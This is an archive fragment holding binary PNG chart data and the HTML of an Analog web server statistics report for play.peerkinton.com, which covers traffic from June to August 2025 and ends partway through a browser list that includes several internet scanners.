+��������e���I�oz�9�"���>s���u�v���yF�~�<ξ�a{[j>�)�� �u ,����v�i����G_����]�N�����а¢�),c(���I����Cw$��7V�ZhX��fX�$,�W���N��F��=?=kzwc��u�qV V`����Pm�p+8;J1X�������d�k�>F8X��u���n˃�,Y���.ݦ���5�eװ2)�����P�[��[�A!4��r�J�o-<,�h� ka�������:�����ΰ����ʗ,�Z����t֢�R� `�������wb�Uk-�k��r�v*��CJ`��z���=�^�*�u;����c6�"X�?��[��:@`��U�X�;Å� `]��Uk�֝`��E����U��nt�X�0X�� `-+�k��Q��a�v�5N�WŰFk�,��v�%��]%�<.-�e������`fh�aw��� `-v�a��� �����D��k,m�;���G��i,m��`�U�ߎW�M�n�ª_�`)km�u%m�u#X8km�^Ia��Za-����BX���u�g4��e�9���:�`e����Y,�>��`T�B�E� *Ha��J�E�ֺJRH�֪�R�,\���U;4a��`�cRH��������;�M� �E����(Ze)�n�"Xm�U�B�E��IaS����BX��n�U�¦`As�_ FŰJS�,���p�*�U�B�E�Iak�`�S ���A�]��V�)$X�*Ma{� �֕�;�R2���`a���S�)$X�*Na��V�V�%q�QJa�^S��/�0 +k�^SH�0J��]\����S����V�MR�Xݦ0 +��.;�ZIX��vk�X��0+��~S����Ly��"Xe`�s�q s����pۤ���z��5�Q���r V9XL��&���V�����UV��jn!$��S�+�aw5�� ,�Z�)lbW�Vay;��>N���e;��_���fX��,��T, ,�j��9l��a9U�(��T,,��X�k bW�I�ĒOn(�@X��VS�`�L�*HaK�Aa鲅��T�b`X�l�S�V�bpXC�B�j���6V��^�����0��D�P6B,��*X{d8X�$6�A��M�{�dXX��h�� ��(�&��jߛEU+��Nq\���ʢl��[����r� a)\r�R1,�F����]��� ��K���#,�B!���B�`!D�"X,�B��Rg��Se���'��gs�?��������^�M�o�� "���g �?���A5� Vj�(�!�멸 w��_����<@j�}���rÜ;��0���x�Р�GX���:�1X�j[�p�fF��?aL�x�+�WSO��K n � =���wPa�1�X�s]�]bj���,=�y��WSO���C��XgU�* ��U�6���Zb��y��,����J��^�Z��6���F��-I#,us�0s�\8���OY�����a��*��͝�1�= ����S���_̈́T�������5��ݥT#� $~ř_�>���YQ%~ùm����� "X,�B!���B�`!D�"X,�B!���B��$���WHO���W�*����X`=12X?��^3֧g� IEND�B`�PK HG�[!�=�, , org.pngnu �[��� �PNG IHDR X �wt� *PLTE��� ������ � � �� � � ��� ��� ��� �z� �IDATx��9r��3oP� ��0x�A ��ڢ+x45&<ѥ5��h|�xU.U�T.�_����|D̀�Buׇ�^e�엏]@}`^�#ԣ+�����Î}���j��Qt������������������������:?�g!�`qg��?A��%��Ni{�%D�a^ K�����Zw�X�A��j�]+`��.ktW˴��*��t�����dO�y_UHXA����[�"V���F{k���i?�+ ��X�a�7�[X�&aݷ�D8�hӰZL"V<�X & +2f(�jo��d���ܦV����@��&���9�`������-��S���_9���JV��,�� �3�|�� �`�X�a�k˃����S��2�U�U�-��,�Za� ��X[,�����,!;�:X�a�jˁ5L~ �'�2�|˰ A��8�V!�eX� ZX�Pkù��[B����%GX��j���q�`Y��U V�� ���YS�Ul,�fv�`C���Κ<,��@� b�X X�X��a=H��4wlea�W�PX�ZXr�E�4�,Hca�W���j� !V2����A%X��6��,X ��R�eaɍ�ja�������YC�����JX˃E��TB���׆��a%r�uV���ƂÊ[����`դ$,h ��ߚN��zkuX�`�S��U}�����Y�I��_�c��q�^��B�X]g �Q�`!�������=�jD �:ሲ�)D�����8�!X��9F�:,���0����,-�� Y���0��ZZ��,j'd"��b�P)Dªzc��B��B(UYHXU�97���A��¥9�z��|����� ��x�E|g;3,��E|[�Ea�*q�P�����윰��<`Q7�` �* ���!��BV�҇IAi��Y��ugY��B���b9�����b�%<VIX5v��a��,�:9���U�:�H����Uk��+�<,�d���G����`���QWX���yޅ^�,l�'a��*��V�� V"�9X�勄��` �A�i`�#��U�%tǀ��`���m�(+��^.a��J�[�k�ڮ7<V�� ���9:�|]�`�w�ᡰJ���z��`�*C�:*�r]-aդc��U����QW��:,D]-a�H���˽Jǁ�`�`�Pʨ���QW9XܹE0��`a�*�\���o��� a����XV�>/�.,��kw��s����g�p�$��@�J��4�mK�xLX"����5K<!�U�54�6Y �>�h%`�{��6k;���pA,������@X��.��m��Í�~�Y�Ba ������PX��z���CL/֖�o_^��B�2a ��gXky��J��܋�N�����o,�C�`+K?ߐOV#x��C`mn��.a=+X� &`M�7T��x��f?gX*�� z<X�=�k��}հ����������o�*��1K?�p�,A���FcIX�/�>�591��:k�sL��Z X�U�:��ua���z�1�[��=�K�����$�)X>�KKV���la���eE�OV+/��T)t`��HEY+amt #��A�4X�X����XS�A�4X�Xc 'X��ֺ0X��2�J[=-�����ea�9,1��]ꏳ.�j���R���b�s~M��q�2�N����g��s�� XXX�Y4��&˱Vn���5P=j?k,]�c %��(�\���S��j�m�fc���9�1<�����]�aic��t�;��A����*<�͜����d���)�T��5K��T�˵V*�YX���B�w3�0+e������SYge�e��� ��0�ճ8t_�>kcS(+kf�`ŃX�yRHX�XS #��F�xI�6N #�kEh5+��d UeM�L��bA���( +i�M ���e�6�4֜B�����~H��<{���R9��5W�V���V�2���>����"Z4��)� �kj��Zas��|�~�S�� kN�\YeX�pX��ܦOV���&`�9��w/��� ŻD��Ⱒ����1��~g�|Ԏ��a�Ʋ��`�#���zA,��;�����P˦0+g��(+��S���Xkm�ba٭�آ��e�7�x�4�5�SY1X�� �a���[�����ȡ5�����9 k bt['6�'�hV Vh-e,'�iX�N֢� ,(�M�B]YQXkEOT���x�Xk`� ֽ�A* ˷�5�I��m�HU�7�6��K�eX<4���,�X�64Rs��I��hJ�r��˃u���c�X��c,��<X�yXOEX�O�bYX�7V,�����"�}(k�V$�xX)˸�U3,�L����� >�X�x !�\ce`� ��V�t����b�1V,�pXIc�kC�76Z˫w�fE`-r�v�[�u�ⁱ�ba�����N��GT�g�����?/><2�� ��८����a֢��``qc,?�XX��|D� ��X ��a�ºT�Ŝ=Ys 㰼�߷B ,��u����ca�F++kl,5��q�T*�e��V�X�>�rf˰�f2֔�,������҇�+��CXSe�`�� ��b"H!���,!�S� ���w ,e�Ԟw��YB�<#H:��F+��fX~�+X�E^�P��K�n �����,�;a�Tm�aA�����M"5a��He`}��Y�<RN���- V��%nk?M�Ha ɵ�A�b k��~v�a1�>�u��E���uB�bܯ��t��m��2�p�tA�� C�RI�ڷ�A��%7eXm�B�G�9X��E�}%��5Fq�6�`�E��QC־�J��5FQ$`?'�P����IX� 'Pi%,�K��w��jX*�R���J� X���Y��pX�������������3Y�Xlg7�ý <������j~U��-/K��=�ʇ��7|%u-=�`%�\�1�f����*�5Jv�`�{]�/3�z]3���|P�6Srn榡��d �7�fHI1X�h� <��S��?�6���r����FJ�m���(��{ 1����1@�s�ܼ��\��,� �<7�V#�g��{ ˵�++K+l�c枫|��{�,�2�ع���9̰����J�R�<E�M�sfa�J�`q6���C[�Q�:�p~7K���^:����e�u�;�;�0�5 3�s�����*ugu�MI��o�X��$�����o}�%p�3������d�#(�Y�o"�a!�a!�a!�a!�a!�a!�a!�a!�a!�a!�a!�a!�a!�a!�a�.�$��.��FX٧lwYmw�����ۻ\m��/��y{� IEND�B`�PK HG�[�3�o�� �� 8.htmlnu �[��� <?xml version="1.0" encoding="ISO-8859-1"?> <?xml-stylesheet href="#internalStyle" type="text/css"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Web Server Statistics for play.peerkinton.com</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <meta name="robots" content="noindex,nofollow" /> <meta name="generator" content="analog 6.0/Unix" /> <style type="text/css" id="internalStyle"> h2 { background-color: #A0C0F0; width: 98%; padding: 3px 6px; } table { text-align: right; margin-left: 30px; background-color: #D0E0F0; border-collapse: collapse; } th { border-bottom: 1px solid #404050; border-right: 1px dotted #606070; border-top: none; border-left: none; padding: 0px 5px 1px 5px; font-weight: bold; background-color: #A0C0F0; } td { padding: 0px 5px 1px 5px; border-right: 1px dotted #606070; border-left: none; border-bottom: none; border-top:none; } td.x { font-family: monospace; white-space: pre; } .xl { text-align: left; border-right: none; } .xr { text-align: right; border-right: none; } .bar { text-align: left; border-right: none; } tr.sub {background-color: #C0C0FF; font-style: italic; } .repdesc { font-style: italic; } .repspan { font-style: italic; } .goto { font-size: small; } .gensumtitle { font-weight: bold; } .gototitle { font-weight: bold; } .runtimetitle { font-weight: bold; } img { border-style: none; } a:link { color: blue; text-decoration: none; } a:visited { color: purple; text-decoration: none; } a:link:hover { text-decoration: underline; } a:visited:hover { text-decoration: underline; } a:link:active { color: red; text-decoration: underline; } a:visited:active { color: red; text-decoration: underline; } </style> </head> <body> <div class="header"><h1><a name="Top" id="Top" href="http://www.analog.cx/"><img src="/images/analogo.png" alt="" /></a> Web Server Statistics for <a href="http://play.peerkinton.com/">play.peerkinton.com</a></h1> <p class="analysisspan">Program started on Sun, Aug 31 2025 at 11:14 AM. <br />Analyzed requests from Sat, Jun 21 2025 at 7:24 PM to Sun, Aug 31 2025 at 1:33 AM (70.26 days).</p> </div> <div class="gensum"><h2><a name="gensum" id="gensum">General Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | General Summary | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="lastseven">Figures in parentheses refer to the 7-day period ending Aug 31 2025 at 11:14 AM.</p> <p class="gensumlines"> <span class="gensumtitle">Successful requests:</span> 168 (6) <br /><span class="gensumtitle">Average successful requests per day:</span> 2 (0) <br /><span class="gensumtitle">Successful requests for pages:</span> 104 (6) <br /><span class="gensumtitle">Average successful requests for pages per day:</span> 1 (0) <br /><span class="gensumtitle">Failed requests:</span> 111 (1) <br /><span class="gensumtitle">Distinct files requested:</span> 15 (55) <br /><span class="gensumtitle">Distinct hosts served:</span> 94 (112) <br /><span class="gensumtitle">Data transferred:</span> 131.28 kilobytes (4.87 kilobytes) <br /><span class="gensumtitle">Average data transferred per day:</span> 1.87 kilobytes (711 bytes) </p> </div><div class="month"><h2><a name="month" id="month">Monthly Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | Monthly Report | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">month</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Jun 2025</td><td class="R">73</td><td class="P">36</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Jul 2025</td><td class="R">36</td><td class="P">32</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++" /></td></tr> <tr><td class="x">Aug 2025</td><td class="R">59</td><td class="P">36</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> </tbody></table> <p class="busiesttime">Busiest month: Jun 2025 (36 requests for pages).</p> </div><div class="daysum"><h2><a name="daysum" id="daysum">Daily Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | Daily Summary | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">day</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Sun</td><td class="R">22</td><td class="P">22</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Mon</td><td class="R">2</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x">Tue</td><td class="R">13</td><td class="P">13</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Wed</td><td class="R">6</td><td class="P">6</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Thu</td><td class="R">35</td><td class="P">12</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Fri</td><td class="R">15</td><td class="P">15</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Sat</td><td class="R">75</td><td class="P">34</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> </tbody></table> </div><div class="hoursum"><h2><a name="hoursum" id="hoursum">Hourly Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | Hourly Summary | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">hour</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">2</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x"> 1</td><td class="R">9</td><td class="P">9</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 2</td><td class="R">6</td><td class="P">6</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x"> 3</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x"> 4</td><td class="R">4</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x"> 5</td><td class="R">4</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x"> 6</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x"> 7</td><td class="R">5</td><td class="P">5</td><td class="bar"><img src="/images/barb4.png" alt="+++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 8</td><td class="R">2</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x"> 9</td><td class="R">7</td><td class="P">7</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">10</td><td class="R">4</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">11</td><td class="R">4</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">12</td><td class="R">2</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x">13</td><td class="R">5</td><td class="P">5</td><td class="bar"><img src="/images/barb4.png" alt="+++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">14</td><td class="R">2</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x">15</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">16</td><td class="R">3</td><td class="P">3</td><td class="bar"><img src="/images/barb2.png" alt="+++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">17</td><td class="R">6</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x">18</td><td class="R">4</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">19</td><td class="R">62</td><td class="P">20</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">20</td><td class="R">7</td><td class="P">7</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">21</td><td class="R">24</td><td class="P">8</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x">22</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">23</td><td class="R">3</td><td class="P">3</td><td class="bar"><img src="/images/barb2.png" alt="+++" /><img src="/images/barb1.png" alt="" /></td></tr> </tbody></table> </div><div class="dom"><h2><a name="dom" id="dom">Domain Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | Domain Report | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="whatinc"> Listing domains, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">domain</th></tr></thead> <tbody><tr><td class="R">168</td><td class="b">100%</td><td class="xl">[unresolved numerical addresses]</td></tr> </tbody></table> </div><div class="org"><h2><a name="org" id="org">Organization Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | Organization Report | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./org.png" alt="" /></p> <p class="whatinc"> Listing the top 20 organizations by the number of requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">organization</th></tr></thead> <tbody><tr><td class="R">33</td><td class="b">23.87%</td><td class="xl">205.169</td></tr> <tr><td class="R">22</td><td class="b">12.71%</td><td class="xl">34</td></tr> <tr><td class="R">13</td><td class="b"> 8.79%</td><td class="xl">35</td></tr> <tr><td class="R">10</td><td class="b"> 7.42%</td><td class="xl">54</td></tr> <tr><td class="R">10</td><td class="b"> 4.69%</td><td class="xl">167.94</td></tr> <tr><td class="R">9</td><td class="b"> 5.57%</td><td class="xl">123</td></tr> <tr><td class="R">8</td><td class="b"> 3.77%</td><td class="xl">206.168</td></tr> <tr><td class="R">4</td><td class="b"> 2.91%</td><td class="xl">185.177</td></tr> <tr><td class="R">4</td><td class="b"> 2.80%</td><td class="xl">157.230</td></tr> <tr><td class="R">4</td><td class="b"> 3.76%</td><td class="xl">198.235</td></tr> <tr><td class="R">3</td><td class="b"> 0.14%</td><td class="xl">194.87</td></tr> <tr><td class="R">3</td><td class="b"> 0.98%</td><td class="xl">44</td></tr> <tr><td class="R">3</td><td class="b"> 1.86%</td><td class="xl">27</td></tr> <tr><td class="R">3</td><td class="b"> 2.34%</td><td class="xl">64.227</td></tr> <tr><td class="R">2</td><td class="b"> 0.13%</td><td class="xl">16</td></tr> <tr><td class="R">2</td><td class="b"> 0.92%</td><td class="xl">72</td></tr> <tr><td class="R">2</td><td class="b"> 0.13%</td><td class="xl">18</td></tr> <tr><td class="R">2</td><td class="b"> 1.88%</td><td class="xl">64.15</td></tr> <tr><td class="R">2</td><td class="b"> 0.13%</td><td class="xl">23</td></tr> <tr><td class="R">2</td><td class="b"> 1.88%</td><td class="xl">192.175</td></tr> <tr><td class="R">27</td><td class="b">13.31%</td><td class="xl">[not listed: 23 organizations]</td></tr> </tbody></table> </div><div class="failref"><h2><a name="failref" id="failref">Failed Referrer Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | Failed Referrer Report | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="whatinc"> Listing referring URLs, sorted by the number of failed requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead> <tbody><tr><td class="R">11</td><td class="xl"><a href="http://www.play.peerkinton.com/">http://www.play.peerkinton.com/</a></td></tr> </tbody></table> </div><div class="refsite"><h2><a name="refsite" id="refsite">Referring Site Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | Referring Site Report | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./refsite.png" alt="" /></p> <p class="whatinc"> Listing referring sites, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">site</th></tr></thead> <tbody><tr><td class="R">40</td><td class="xl">http://www.play.peerkinton.com/</td></tr> <tr><td class="R">8</td><td class="xl">http://play.peerkinton.com/</td></tr> </tbody></table> </div><div class="browrep"><h2><a name="browrep" id="browrep">Browser Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | Browser Report | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browrep.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="R">20</td><td class="P">20</td><td class="xl">Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)</td></tr> <tr><td class="R">10</td><td class="P">10</td><td class="xl">Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)</td></tr> <tr><td class="R">8</td><td class="P">8</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11</td></tr> <tr><td class="R">7</td><td class="P">7</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36</td></tr> <tr><td class="R">12</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Go-http-client/1.1</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0</td></tr> <tr><td class="R">12</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Linux; Android 8.0.0; SM-G965U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36</td></tr> <tr><td class="R">15</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36</td></tr> <tr><td class="R">6</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity</td></tr> <tr><td class="R">10</td><td class="P">2</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Linux; Android 5.1.1; SM-J111F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA540537) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3260.98 Mobile Safari/537.3</td></tr> <tr><td class="R">10</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0</td></tr> <tr><td class="R">3</td><td class="P">1</td><td class="xl">python-httpx/0.28.1</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (X11; Ubuntu; 